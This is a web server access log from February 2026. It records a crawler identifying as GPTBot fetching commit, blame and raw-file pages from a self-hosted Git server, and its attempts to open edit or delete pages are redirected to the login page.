"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" +[17/Feb/2026:15:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:15:07:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/nginx.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/nginx.conf" +[17/Feb/2026:15:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/nginx.conf" +[17/Feb/2026:15:07:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/projects.sln" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" +[17/Feb/2026:15:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/projects.sln" +[17/Feb/2026:15:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/projects.sln" [Client 74.7.227.38] [Length 11202] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" +[17/Feb/2026:15:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/projects.sln" [Client 74.7.227.38] [Length 9787] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" +[17/Feb/2026:15:07:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/projects.sln" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" +[17/Feb/2026:15:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/projects.sln" +[17/Feb/2026:15:07:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/nginx.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/nginx.conf" +[17/Feb/2026:15:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/nginx.conf" +[17/Feb/2026:15:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/projects.sln" [Client 74.7.227.38] [Length 1089] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" +[17/Feb/2026:15:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/projects.sln" [Client 74.7.227.38] [Length 871] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" +[17/Feb/2026:15:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:15:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 74.7.227.38] [Length 10977] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:15:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fservices%2fgeminiService.ts" [Client 74.7.227.38] [Length 25015] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages" [Client 74.7.227.38] [Length 26171] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:15:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 36000] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:15:07:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/projects.sln" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/projects.sln" +[17/Feb/2026:15:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/projects.sln" +[17/Feb/2026:15:07:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/projects.sln" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/projects.sln" +[17/Feb/2026:15:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/projects.sln" +[17/Feb/2026:15:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14852] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9894] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:15:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9894] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:15:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9894] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:15:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 14748] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:15:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2ffallback_stream_access.log" [Client 74.7.227.38] [Length 21167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:15:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" +[17/Feb/2026:15:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11904] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" +[17/Feb/2026:15:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12891] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" +[17/Feb/2026:15:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 10905] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 10904] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 10875] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 44619] [Gzip 12.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" +[17/Feb/2026:15:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt%2frenewal%2fnpm-7.conf" [Client 74.7.227.38] [Length 22345] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:15:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt%2frenewal%2fnpm-1.conf" [Client 74.7.227.38] [Length 22443] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:15:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 15112] [Gzip 8.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" +[17/Feb/2026:15:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" +[17/Feb/2026:15:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 3545] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" +[17/Feb/2026:15:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt%2frenewal%2fnpm-4.conf" [Client 74.7.227.38] [Length 22424] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:15:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt%2frenewal%2fnpm-2.conf" [Client 74.7.227.38] [Length 22455] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:15:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 32259343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:15:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 32259343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:15:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9529] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:15:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 60353] [Gzip 23.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:15:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 32259343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:15:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9529] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:15:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9529] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:15:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 74447] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:15:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt%2frenewal%2fnpm-6.conf" [Client 74.7.227.38] [Length 22444] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:15:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument" [Client 74.7.227.38] [Length 156403] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:15:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11904] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" +[17/Feb/2026:15:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 12263] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 